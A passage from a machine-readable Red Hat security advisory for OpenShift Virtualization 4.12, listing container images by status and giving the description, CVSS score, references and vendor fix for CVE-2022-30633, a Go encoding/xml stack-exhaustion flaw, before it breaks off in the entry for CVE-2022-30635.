"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107392", }, ], notes: [ { category: "description", text: "A flaw was found in golang. Calling Unmarshal on an XML document into a Go struct, which has a nested field that uses the \"any\" field tag, can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/xml: stack exhaustion in Unmarshal", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30633", }, { category: "external", summary: "RHBZ#2107392", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30633", url: "https://www.cve.org/CVERecord?id=CVE-2022-30633", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30633", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30633", }, { category: "external", summary: "https://go.dev/issue/53611", url: "https://go.dev/issue/53611", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/xml: stack exhaustion in Unmarshal", }, { cve: "CVE-2022-30635", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", 